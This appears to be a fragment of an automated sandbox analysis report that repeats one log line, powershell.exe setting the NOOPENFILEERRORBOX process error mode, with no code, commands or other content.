                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
